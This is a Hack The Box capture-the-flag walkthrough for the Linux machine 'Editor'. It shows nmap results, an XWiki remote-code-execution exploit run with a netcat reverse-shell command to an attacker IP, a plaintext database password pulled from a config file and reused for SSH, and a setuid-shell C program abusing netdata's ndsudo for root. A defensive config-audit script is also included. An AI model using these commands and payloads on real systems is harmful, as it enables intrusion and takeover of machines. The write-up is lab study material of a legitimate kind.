
HTB-Editor

HTB-Machine Hackthebox Linux
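Author: HYH
A technology enthusiast focused on network security, penetration testing and CTF challenges, keen on documenting hands-on experience and sharing tools and techniques, and committed to continuous learning and growth.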

Box Info

OS Difficulty
Linux Easy

Nmap

[root@Hacking] /home/kali/Editor  
❯ nmap editor.htb -A                                                                       

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was http://editor.htb:8080/xwiki/bin/view/Main/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Type: Jetty(10.0.20)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/

CVE-2025-24893

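Browsing to port 8080, the version information is shown at the bottom of the page.

A search turned up this script.

The script can be used directly to get a reverse shell: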

python CVE-2024-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.16.31 4444 -e /bin/bash'    

Reference: Configuration (XWiki.org)

The password field is found in hibernate.cfg.xml:

xwiki@editor:/usr/lib/xwiki/WEB-INF$ cat hibernate.cfg.xml  |grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
xwiki@editor:/usr/lib/xwiki/WEB-INF$ 

Of these, the password theEd1t0rTeam99 can be used to log in as the user oliver.
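For the defensive side of this finding, an added example (not from the original write-up or from XWiki): a Python audit that reports which `hibernate.connection.password` entries are live rather than commented out, and whether the file is world-readable. The sample file, its placeholder password and the function names are constructed; treating `xwiki` as the shipped example value is an assumption based on the repeated value in the grep output, as is the layout with alternative database blocks inside XML comments.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample, not the target's real file: one live block and one
# commented-out alternative, with a placeholder password.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.password">EXAMPLE-Secret-1</property>
    <!--
    <property name="hibernate.connection.password">xwiki</property>
    -->
  </session-factory>
</hibernate-configuration>
"""

def audit(path):
    """Return findings for live DB passwords and loose file permissions."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"world-readable (mode {mode:o})")
    # ElementTree discards XML comments, so only live properties are visited
    # (a plain grep also matches the commented-out blocks).
    for prop in ET.parse(path).getroot().iter("property"):
        if prop.get("name") != "hibernate.connection.password":
            continue
        value = (prop.text or "").strip()
        if not value:
            findings.append("live password is empty")
        elif value == "xwiki":  # assumed shipped example value
            findings.append("live password is the default 'xwiki'")
        else:  # never echo the secret itself into the report
            findings.append("live non-default password stored in cleartext")
    return findings

def demo():
    """Write the constructed sample with mode 0644 and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as fh:
        fh.write(SAMPLE)
    os.chmod(fh.name, 0o644)
    try:
        return audit(fh.name)
    finally:
        os.unlink(fh.name)

if __name__ == "__main__":
    print("\n".join(demo()))
```

A cleartext database password that is also valid for a system account, as here, is the condition to rotate first; restricting the file to the service account only limits who can read it.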

Root

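Searching for files with special permissions turns up a suspicious ndsudo.

A search turned up this PoC: AzureADTrent/CVE-2024-32019-POC: POC for netdata ndsudo vulnerability - CVE-2024-32019

Since the target machine has no gcc, the PoC has to be compiled locally and uploaded: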

[root@Hacking] /home/kali/Editor  
❯ cat poc.c                                                
#include <unistd.h>

int main() {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

[root@Hacking] /home/kali/Editor  
❯ gcc poc.c -o nvme

[root@Hacking] /home/kali/Editor  
❯ scp nvme oliver@editor.htb:/tmp/
oliver@editor.htb's password: 
nvme                                                                                                          100%   16KB  64.2KB/s   00:00    

Root privileges obtained.
